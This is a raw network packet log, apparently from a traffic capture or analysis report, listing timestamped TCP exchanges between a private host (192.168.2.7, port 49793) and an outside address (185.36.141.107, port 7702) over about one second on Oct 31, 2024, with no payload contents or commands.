Oct 31, 2024 14:16:33.236180067 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.236226082 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.236238003 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.236248970 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.236270905 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.236293077 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.239341021 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.239402056 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.239413023 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.239480019 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.284147978 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.284172058 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.284184933 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.284219027 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.330449104 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.335108995 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.335120916 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.335170031 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.335170984 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.335211992 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.336309910 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.354103088 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354165077 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354176044 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354258060 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.354276896 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354317904 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.354341984 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354352951 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354438066 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.354650021 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354661942 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354680061 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354716063 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.354789019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354803085 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.354852915 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.357681990 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.357691050 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.357716084 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.357960939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.357970953 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.358020067 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.402540922 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402554035 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402565002 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402612925 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.402657986 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402668953 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.402668953 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402683020 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.402724981 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.402724981 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.453953981 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.453968048 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.453980923 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.454022884 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.454056978 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.472657919 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.472670078 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.472706079 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.472728014 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.472763062 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.472774982 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.472832918 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.472867012 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.472996950 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473017931 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473052025 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.473068953 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473114967 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.473331928 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473387957 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473397970 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.473436117 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.476377964 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.476409912 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.476421118 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.476454973 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.476485014 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.476784945 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.477214098 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.477298975 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.521300077 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521361113 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521378994 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521415949 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.521589041 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521600008 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521609068 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.521646976 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.521675110 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.766612053 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.766870022 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.766967058 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767023087 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767061949 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767061949 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767077923 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767088890 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767102003 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767113924 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767127037 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767138004 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767215014 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767299891 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767326117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767338037 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767359972 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767369986 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767411947 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767420053 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767420053 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767420053 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767425060 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767494917 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.767857075 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767867088 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.767970085 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.768254042 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.768338919 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.769071102 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769082069 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769088030 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769098997 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769109964 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769119978 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.769402981 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.769403934 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.769994020 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770005941 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770015001 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770026922 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770037889 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770051003 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770062923 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770073891 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770086050 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770093918 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770093918 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770093918 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770189047 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770874023 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770888090 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770900965 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770911932 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770921946 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770934105 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.770958900 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770960093 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.770960093 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.771017075 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771028996 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771116018 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.771768093 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771781921 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771792889 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771835089 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771846056 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771856070 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.771871090 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.771871090 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.772083998 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.805624962 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.805639029 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.805658102 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.805672884 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.805757999 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.810302019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.810348034 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.810359001 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.810403109 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.810461044 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.810473919 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.810501099 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.828701973 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.828762054 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.828766108 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.828779936 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.828824043 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.828864098 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.828876019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.828938961 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.828947067 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.829054117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.829065084 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.829097986 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.832504988 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832546949 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.832557917 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832571030 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832616091 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.832653046 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832876921 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832946062 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.832968950 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.876787901 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.876822948 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.876833916 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.876857042 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.876910925 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.924704075 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.924757957 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.924770117 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.924906015 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.928586960 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.928638935 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.928644896 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.928653002 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.928728104 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.928733110 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.928746939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.928792953 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.947062969 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947113991 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947127104 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947185993 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.947258949 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947326899 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947348118 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947396040 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.947602987 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947624922 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947634935 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.947711945 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.951188087 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.951210976 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.951224089 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.951330900 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.951330900 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.951361895 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.951375961 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.951416016 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.993413925 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.993483067 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.993714094 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:33.995259047 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.995337963 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.995349884 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:33.995413065 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.042994022 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.043072939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.043112040 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.043198109 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.043226004 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.043241978 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.047044039 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047055960 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047069073 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047122002 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.047132015 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.047147036 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047159910 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047171116 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.047194958 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.065999031 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066025019 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066035986 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066066980 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.066066980 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.066339970 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066354036 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066365957 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066394091 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.066436052 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066448927 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066459894 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.066477060 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.066562891 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.069750071 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.069830894 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.069844007 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.069925070 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.069936991 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.069972992 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.069998026 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.113876104 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.113909006 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.114015102 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.114063025 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.114227057 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.114312887 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.114347935 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.158592939 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.163121939 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.163145065 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.163155079 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.163209915 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.165894032 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.165955067 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.165958881 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.165966988 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.166022062 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.166126966 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.166138887 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.166207075 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.184983969 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185050964 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185061932 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185097933 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.185179949 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185192108 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185201883 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185239077 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.185286045 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.185395002 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185406923 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185425043 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185436964 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.185496092 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.185497046 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.188379049 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.188399076 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.188410997 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.188438892 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.188534021 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.188545942 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.188606977 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.232460022 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.232479095 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.232489109 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.232544899 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.232544899 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.277131081 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.277193069 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.277267933 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.277453899 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.277466059 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.277517080 CET	49793	7702	192.168.2.7	185.36.141.107
Oct 31, 2024 14:16:34.280323982 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.280383110 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.280396938 CET	7702	49793	185.36.141.107	192.168.2.7
Oct 31, 2024 14:16:34.280493975 CET	49793	7702	192.168.2.7	185.36.141.107
